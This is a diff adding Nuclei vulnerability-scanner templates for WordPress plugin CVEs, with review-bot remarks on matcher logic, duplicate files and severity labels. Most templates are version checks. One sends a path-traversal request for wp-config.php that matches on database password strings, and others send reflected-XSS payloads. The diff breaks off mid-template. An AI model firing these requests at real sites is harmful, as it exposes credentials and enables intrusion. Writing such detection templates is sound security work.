matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2019-14205-3823.yaml b/poc/cve/CVE-2019-14205-3823.yaml new file mode 100644 index 0000000000..8e31524064 --- /dev/null +++ b/poc/cve/CVE-2019-14205-3823.yaml 
@@ -0,0 +1,28 @@ +id: CVE-2019-14205 +info: + name: WordPress Ext Adaptive Images LFI + author: pikpikcu + severity: high + tags: cve,cve2019,wordpress,wp-plugin,lfi + description: A Local File Inclusion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php. + reference: https://github.com/security-kma/EXPLOITING-CVE-2019-14205 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-14205 + cwe-id: CWE-22 +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php' + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2021-24176-5636.yaml b/poc/cve/CVE-2021-24176-5636.yaml new file mode 100644 index 0000000000..1d03f5739e --- /dev/null +++ b/poc/cve/CVE-2021-24176-5636.yaml 
@@ -0,0 +1,32 @@ +id: CVE-2021-24176 + +info: + name: WordPress JH 404 Logger XSS + author: Ganofins + severity: medium + description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard. + reference: + - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585 + - https://wordpress.org/plugins/jh-404-logger/ + tags: cve,cve2021,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2021-24176 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt" + + matchers-condition: and + matchers: + - type: word + words: + - "JH 404 Logger" + part: body + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/cve/CVE-2021-24342-5715.yaml b/poc/cve/CVE-2021-24342-5715.yaml new file mode 100644 index 0000000000..ea8174ddb3 --- /dev/null +++ b/poc/cve/CVE-2021-24342-5715.yaml 
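Review bot: The template only fetches `readme.txt` and matches the plugin name `JH 404 Logger` with a 200, so it fires on every install of the plugin, including versions after 1.1 that the description says are fixed, and nothing in it checks the stored-XSS condition the description talks about. Gating the match on the version published in the readme, as the CVE-2024-* templates in this same commit do with a `Stable tag` extractor and `compare_versions`, removes the blanket positive at the cost of a miss when the readme has no `Stable tag` line; I would add the extractor and a `dsl` matcher as below. The file also ends without a trailing newline (`\ No newline at end of file`), which the rest of the commit's templates avoid.
```yaml
requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        internal: true
        regex:
          - "(?mi)Stable tag: ([0-9.]+)"

    matchers-condition: and
    matchers:
      # … unchanged: "JH 404 Logger" word matcher and status 200 matcher …
      - type: dsl
        dsl:
          - compare_versions(version, '<= 1.1')
```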
@@ -0,0 +1,43 @@ +id: CVE-2021-24342 + +info: + name: JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS) + author: pikpikcu + severity: medium + description: JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue. + reference: + - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e + - https://nvd.nist.gov/vuln/detail/CVE-2021-24342 + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24342 + cwe-id: CWE-79 + +requests: + - raw: + - | + POST /?ajax-request=jnews HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + lang=en_US&cat_id=6">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2022-0422(1).yaml b/poc/cve/CVE-2022-0422(1).yaml new file mode 100644 index 0000000000..75d7077c97 --- /dev/null +++ b/poc/cve/CVE-2022-0422(1).yaml 
@@ -0,0 +1,63 @@ +id: CVE-2022-0422 + +info: + name: WordPress White Label CMS <2.2.9 - Cross-Site Scripting + author: random-robbie + severity: medium + description: | + WordPress White Label CMS plugin before 2.2.9 contains a reflected cross-site scripting vulnerability. It does not sanitize and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Update to WordPress White Label CMS plugin version 2.2.9 or later to mitigate this vulnerability. + reference: + - https://wpscan.com/vulnerability/429be4eb-8a6b-4531-9465-9ef0d35c12cc + - https://plugins.trac.wordpress.org/changeset/2672615 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0422 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0422 + cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40139 + cpe: cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: videousermanuals + product: white_label_cms + framework: wordpress + tags: cve2022,cve,wordpress,xss,wp-plugin,wpscan,videousermanuals + +http: + - raw: + - | + POST /wp-login.php?wlcms-action=preview HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "alert(/XSS/);" + + - type: word + part: body + words: + - "wlcms-login-wrapper" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 
490a0046304402202d864fa8ffa1dc0885d61b1e349c1c268e266c83d7d2e11e236e9df48039abe002205fb0b2d84d41d806cc6e52c0fdd1dbeed94827fa1019c490c3926ec16402eb79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2024-10046.yaml b/poc/cve/CVE-2024-10046.yaml new file mode 100644 index 0000000000..2fcd3d1aef --- /dev/null +++ b/poc/cve/CVE-2024-10046.yaml 
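Review bot: The new file is named `CVE-2022-0422(1).yaml`, a browser-style duplicate suffix, while poc.txt already lists `CVE-2022-0422.yaml` and `CVE-2022-0422-af03e6837ec88ed4891cf93143a78408.yaml`; this appears to be a third copy of the same template and the name does not follow the `-<md5>` scheme the rest of the repository uses for variants. If the content is identical to one of the existing files it should be dropped; otherwise rename it to the content-hash form so the collection stays deduplicable by name. The trailing `# digest:` line appears to be the upstream nuclei-templates signature over the exact template bytes and is only meaningful while the body stays byte-identical to upstream, so it should be removed or regenerated if anything in this copy was edited.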
@@ -0,0 +1,59 @@ +id: CVE-2024-10046 + +info: + name: > + افزونه پیامک ووکامرس Persian WooCommerce SMS <= 7.0.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The افزونه پیامک ووکامرس Persian WooCommerce SMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 7.0.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/175a69da-c47a-40f3-98c7-7cfcdf98f9f6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-10046 + metadata: + fofa-query: "wp-content/plugins/persian-woocommerce-sms/" + google-query: inurl:"/wp-content/plugins/persian-woocommerce-sms/" + shodan-query: 'vuln:CVE-2024-10046' + tags: cve,wordpress,wp-plugin,persian-woocommerce-sms,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/persian-woocommerce-sms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "persian-woocommerce-sms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.0.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11010.yaml b/poc/cve/CVE-2024-11010.yaml new file mode 100644 index 0000000000..3225f1d4d7 --- /dev/null +++ b/poc/cve/CVE-2024-11010.yaml 
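Review bot: Two regex extractors named `version` run the identical pattern `(?mi)Stable tag: ([0-9.]+)`, the first `internal: true` and the second not, so the same value is extracted twice. If the intent is only to feed `compare_versions(version, '<= 7.0.5')`, the second extractor is redundant; if the version should also appear in the output, a single non-internal extractor should, as far as I can tell, serve both purposes — worth confirming against the nuclei version in use before collapsing them. The same pair appears in the CVE-2024-11010 and CVE-2024-11329 hunks. Note that the check is a version fingerprint read from `readme.txt`, not a probe of the affected code path, so it reports on the published version only and does not confirm the issue.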
@@ -0,0 +1,59 @@ +id: CVE-2024-11010 + +info: + name: > + FileOrganizer <= 1.1.4 - Authenticated (Administrator+) Local JavaScript File Inclusion + author: topscoder + severity: low + description: > + The FileOrganizer – Manage WordPress and Website Files plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.4 via the 'default_lang' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e958653-36c4-4979-89e1-d9411a35a92a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-11010 + metadata: + fofa-query: "wp-content/plugins/fileorganizer/" + google-query: inurl:"/wp-content/plugins/fileorganizer/" + shodan-query: 'vuln:CVE-2024-11010' + tags: cve,wordpress,wp-plugin,fileorganizer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fileorganizer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fileorganizer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11329.yaml b/poc/cve/CVE-2024-11329.yaml new file mode 100644 index 0000000000..35c4b2a80c 
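Review bot: `severity: low` and the `low` tag disagree with `cvss-score: 7.2` (CVSS:3.1 with PR:H and C:H/I:H/A:H), which falls in the High band; since nuclei's `-severity` filter keys on this field, a local file inclusion rated 7.2 would be dropped from high-and-above runs. Change to `severity: high` and `tags: cve,wordpress,wp-plugin,fileorganizer,high`. The same mismatch appears in CVE-2024-11501 (`low` with 8.8), and in CVE-2024-11380, CVE-2024-11451 and CVE-2024-11904 (`low` with 6.4, the Medium band); CVE-2024-11353 and CVE-2024-12026 label 4.3 as `low` while CVE-2024-12115 labels the same 4.3 as `medium`, so the mapping is inconsistent within the commit itself. If the severity is intentionally taken from the Wordfence listing rather than the CVSS band, a comment saying so next to `severity:` would stop this being re-raised.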
--- /dev/null +++ b/poc/cve/CVE-2024-11329.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11329 + +info: + name: > + Comfino Payment Gateway <= 4.1.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Comfino Payment Gateway plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.1.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/006945a3-5f54-4bb8-9522-c832d59624a0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11329 + metadata: + fofa-query: "wp-content/plugins/comfino-payment-gateway/" + google-query: inurl:"/wp-content/plugins/comfino-payment-gateway/" + shodan-query: 'vuln:CVE-2024-11329' + tags: cve,wordpress,wp-plugin,comfino-payment-gateway,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/comfino-payment-gateway/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "comfino-payment-gateway" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11353.yaml b/poc/cve/CVE-2024-11353.yaml new file mode 100644 index 0000000000..e750a8aecb --- /dev/null +++ b/poc/cve/CVE-2024-11353.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11353 + +info: + name: > + SMS for Lead Capture Forms <= 1.1.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Message Deletion + author: topscoder + severity: low + description: > + The SMS for Lead Capture Forms plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_message() function in all versions up to, and including, 1.1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary messages. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a0c68bb6-77a2-4232-923a-37f2c0327743?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-11353 + metadata: + fofa-query: "wp-content/plugins/clicksend-lead-capture-form/" + google-query: inurl:"/wp-content/plugins/clicksend-lead-capture-form/" + shodan-query: 'vuln:CVE-2024-11353' + tags: cve,wordpress,wp-plugin,clicksend-lead-capture-form,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clicksend-lead-capture-form/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clicksend-lead-capture-form" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11367.yaml b/poc/cve/CVE-2024-11367.yaml new file mode 100644 index 0000000000..5392835e28 --- /dev/null +++ b/poc/cve/CVE-2024-11367.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11367 + +info: + name: > + Smoove connector for Elementor forms <= 4.1.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Smoove connector for Elementor forms plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.1.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8129bc3a-41c9-4a1e-8e04-55e23bb8d46d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11367 + metadata: + fofa-query: "wp-content/plugins/smoove-elementor/" + google-query: inurl:"/wp-content/plugins/smoove-elementor/" + shodan-query: 'vuln:CVE-2024-11367' + tags: cve,wordpress,wp-plugin,smoove-elementor,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/smoove-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "smoove-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11374.yaml b/poc/cve/CVE-2024-11374.yaml new file mode 100644 index 0000000000..b9164a82ab --- /dev/null +++ b/poc/cve/CVE-2024-11374.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11374 + +info: + name: > + TWChat – Send or receive messages from users <= 4.0.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The TWChat – Send or receive messages from users plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.0.4. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb047d0-0056-432c-bae3-3ab926e39bcd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11374 + metadata: + fofa-query: "wp-content/plugins/twchat/" + google-query: inurl:"/wp-content/plugins/twchat/" + shodan-query: 'vuln:CVE-2024-11374' + tags: cve,wordpress,wp-plugin,twchat,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/twchat/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "twchat" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11380.yaml b/poc/cve/CVE-2024-11380.yaml new file mode 100644 index 0000000000..9ba199bd46 --- /dev/null +++ b/poc/cve/CVE-2024-11380.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11380 + +info: + name: > + Mini Program API <= 1.4.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Mini Program API plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'qvideo' shortcode in all versions up to, and including, 1.4.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a0b9499b-3017-46a6-80d5-104d203b77f0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11380 + metadata: + fofa-query: "wp-content/plugins/wp-mini-program/" + google-query: inurl:"/wp-content/plugins/wp-mini-program/" + shodan-query: 'vuln:CVE-2024-11380' + tags: cve,wordpress,wp-plugin,wp-mini-program,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-mini-program/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-mini-program" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11436.yaml b/poc/cve/CVE-2024-11436.yaml new file mode 100644 index 0000000000..57574432fe --- /dev/null +++ b/poc/cve/CVE-2024-11436.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11436 + +info: + name: > + Drag & Drop Builder, Human Face Detector, Pre-built Templates, Spam Protection, User Email Notifications & more! <= 1.4.19 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Drag & Drop Builder, Human Face Detector, Pre-built Templates, Spam Protection, User Email Notifications & more! plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.4.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/125a1d8d-8cd9-439c-b765-198ad369f987?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11436 + metadata: + fofa-query: "wp-content/plugins/pie-forms-for-wp/" + google-query: inurl:"/wp-content/plugins/pie-forms-for-wp/" + shodan-query: 'vuln:CVE-2024-11436' + tags: cve,wordpress,wp-plugin,pie-forms-for-wp,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pie-forms-for-wp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pie-forms-for-wp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.19') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-11451.yaml b/poc/cve/CVE-2024-11451.yaml new file mode 100644 index 0000000000..0353789fd9 --- /dev/null +++ b/poc/cve/CVE-2024-11451.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11451 + +info: + name: > + Zooom <= 1.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Zooom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'zooom' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6bd15878-a290-4613-83d9-011d60bb0233?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11451 + metadata: + fofa-query: "wp-content/plugins/zooom/" + google-query: inurl:"/wp-content/plugins/zooom/" + shodan-query: 'vuln:CVE-2024-11451' + tags: cve,wordpress,wp-plugin,zooom,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/zooom/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "zooom" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11457.yaml b/poc/cve/CVE-2024-11457.yaml new file mode 100644 index 0000000000..f359830428 --- /dev/null 
+++ b/poc/cve/CVE-2024-11457.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11457 + +info: + name: > + Feedpress Generator – External RSS Frontend Customizer <= 1.2.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Feedpress Generator – External RSS Frontend Customizer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f9660aee-1069-4197-b166-12ea30f8fd0c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11457 + metadata: + fofa-query: "wp-content/plugins/feedpress-generator/" + google-query: inurl:"/wp-content/plugins/feedpress-generator/" + shodan-query: 'vuln:CVE-2024-11457' + tags: cve,wordpress,wp-plugin,feedpress-generator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/feedpress-generator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "feedpress-generator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11464.yaml b/poc/cve/CVE-2024-11464.yaml new file mode 100644 index 0000000000..130aad6147 --- /dev/null 
+++ b/poc/cve/CVE-2024-11464.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11464 + +info: + name: > + Easy Code Snippets <= 1.0.2 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Easy Code Snippets plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/31f5ddbf-2014-40e7-881d-27148bf133ff?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11464 + metadata: + fofa-query: "wp-content/plugins/easy-code-snippets/" + google-query: inurl:"/wp-content/plugins/easy-code-snippets/" + shodan-query: 'vuln:CVE-2024-11464' + tags: cve,wordpress,wp-plugin,easy-code-snippets,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-code-snippets/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-code-snippets" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11501.yaml b/poc/cve/CVE-2024-11501.yaml new file mode 100644 index 0000000000..775244fb3f --- /dev/null +++ b/poc/cve/CVE-2024-11501.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11501 + +info: + name: > + Gallery <= 1.3 - Authenticated (Contributor+) PHP Object Injection + author: topscoder + severity: low + description: > + The Gallery plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3 via deserialization of untrusted input from wd_gallery_$id parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/778f7d9b-6376-4026-a291-1fedeabe8c99?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-11501 + metadata: + fofa-query: "wp-content/plugins/multi-gallery/" + google-query: inurl:"/wp-content/plugins/multi-gallery/" + shodan-query: 'vuln:CVE-2024-11501' + tags: cve,wordpress,wp-plugin,multi-gallery,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - 